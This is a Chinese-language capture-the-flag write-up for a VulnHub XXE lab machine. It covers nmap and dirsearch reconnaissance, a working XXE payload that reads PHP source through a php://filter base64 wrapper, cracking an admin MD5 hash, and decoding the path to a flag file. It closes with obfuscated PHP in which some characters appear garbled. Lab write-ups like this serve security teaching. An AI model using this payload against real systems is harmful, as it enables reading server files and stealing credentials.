XXE 漏洞实战

补充知识

namp使用

特点

? 主机探测:探测网络上的主机,如列出响应TCP,ICMP请求,开放特别端口的主机
? 端口扫描: 探测目标主机所开放的端口
? 版本探测:探测目标主机的网络服务,其服务名称及版本号

常用命令

nmap -sP 192.168.0.1/24 扫描目标地址所在的C段在线情况
nmap -O 识别目标地址的操作系统
nmap -sV 检测目标地址开放的端口对应的服务版本信息
nmap sn 检测主机,不进行端口扫描
扫描某一目标地址的端口 nmap 地址 -p 21,22

安装

www.vulnhub.com

搜索xxe 虚拟机直接打开导入即可

实战

打开之后是这样的

请添加图片描述

先用nmap 一下扫出地址

nmap -sn 命令

请添加图片描述

扫除地址

习惯性查看 robots.txt
请添加图片描述

当然用dirsearch 扫也可以

请添加图片描述

接着访问xxe 得到一个登录地址

抓一下包得到 xml 数据这里说一下xml是传输和存储数据用的而xxe是xml产生的漏洞

我们将漏洞语句尝试插入

尝试利用协议读文件绕过这样的话就不用考虑路径了直接读

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=xxe.php">]>
<root><name>&xxe;</name><password>123</password></root>

得到base64码解得

请添加图片描述

读admin.php 为发现用户名密码

请添加图片描述

md5解得密码为 admin@123

这里得到的是是xxe 目录下的admin.php 文件所以url要注意

输入后登录成功

请添加图片描述

点flag 后却没有反应

得到了url地址 http://192.168.43.58/flagmeout.php 所以可尝试重新在根目录下读取源文件

只需要改成./flagmeout.php

得到

<?php
$flag = "<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->";
echo $flag;
?>

继续base32解密读

得到 /etc/.flag.php

最终得到

$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$à=+_;$á=$?=$?=$?=$?=$è=$é=$ê=$?=++$á[];$?++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$è++;$è++;$è++;$è++;$è++;$é++;$é++;$é++;$é++;$é++;$é++;$ê++;$ê++;$ê++;$ê++;$ê++;$ê++;$ê++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$__('$_="'.$___.$á.$?.$?.$___.$á.$à.$á.$___.$á.$à.$è.$___.$á.$à.$?.$___.$á.$?.$?.$___.$á.$?.$à.$___.$á.$é.$?.$___.$á.$é.$à.$___.$á.$é.$à.$___.$á.$?.$?.$___.$á.$?.$é.$___.$á.$?.$á.$___.$á.$è.$?.$___.$á.$?.$é.$___.$á.$è.$?.$___.$á.$?.$é.$___.$á.$?.$é.$___.$á.$?.$?.$___.$á.$?.$á.$___.$á.$è.$?.$___.$á.$é.$á.$___.$á.$é.$?.'"');$__($_);